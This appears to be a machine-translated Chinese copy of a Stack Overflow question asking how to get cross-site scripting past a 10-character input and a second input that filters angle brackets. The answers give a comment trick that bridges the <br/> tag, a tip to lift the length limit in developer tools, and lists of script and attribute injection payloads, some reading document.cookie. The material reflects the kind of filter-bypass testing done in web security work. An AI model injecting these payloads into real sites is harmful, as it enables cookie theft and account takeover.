2016-09-20 59 views
-2

如何执行跨站脚本攻击这些限制:XSS与<script>随后<br/>

[input 1] <br/> [input 2]

输入1具有以下限制: - 只有10个字符 - Unsanitized

输入2具有以下限制: - “<”,“>”,“&”已过滤 - 没有其他限制

此外,网页允许持久性输入,但一旦我打开标签,我无法执行额外的输入。

我试图做:

<script> <br/> alert(document.cookie)

但它似乎并没有在那里工作大概是因为BR标签。 关于我应该如何继续的想法?

+0

我想知道为什么人们低估了这一点。这是一个可以回答的编程问题。 –

回答

0

例如:<script>/* <br/> */ alert(1); /*

+0

这不提供问题的答案。要批评或要求作者澄清,请在其帖子下方留言。 - [来自评论](/ review/low-quality-posts/13730370) – Liam

+0

@Liam这确实提供了一个问题的答案。 –

+1

有人将此标记为不是答案(不是我)。它被发送到我(和其他人)[审查它]的评论队列(http://stackoverflow.com/review/low-quality-posts/13730370)。对我而言,这个答案没有很好的解释,并且像评论一样。如果你添加更多的细节,你可以避免它被删除。我的投票现在通过,我无法撤消它,但需要几个选票才能删除答案。所以,如果你充分纠正它,你可以避免删除。只是重新迭代,我不能再改变这个过程 – Liam

1

你说:

输入1具有以下限制: - 只有10个字符 - Unsanitized

如果输入的值只是体现在页面(没有控制服务器端的最大长度),您可以使用浏览器的开发人员工具来增加输入的最大长度值,然后输入你想要的有效载荷。

然后你说:

输入2具有以下限制: - “<”, “>”, “&” 的消毒 - 没有任何其他限制

现在这取决于其中该输入值反映如下:

如果输入参数值反映在Javascript中,则可以尝试:

";alert('XSS');// 
");alert(document.cookie); 
; window.open(www.google.com); 
';alert(String.fromCharCode(88,83,83))// 

如果输入参数值是反映在HTML输入标记或其他HTML代码,你可以尝试:

1? onmouseover=alert("xss"); " 
"onload='confirm("test XSS")’ 
" onload=window.open(www.google.com) 
" onload='javascript:alert(1)’ 

XSS取决于在那里被反射!你也必须使用你的大脑。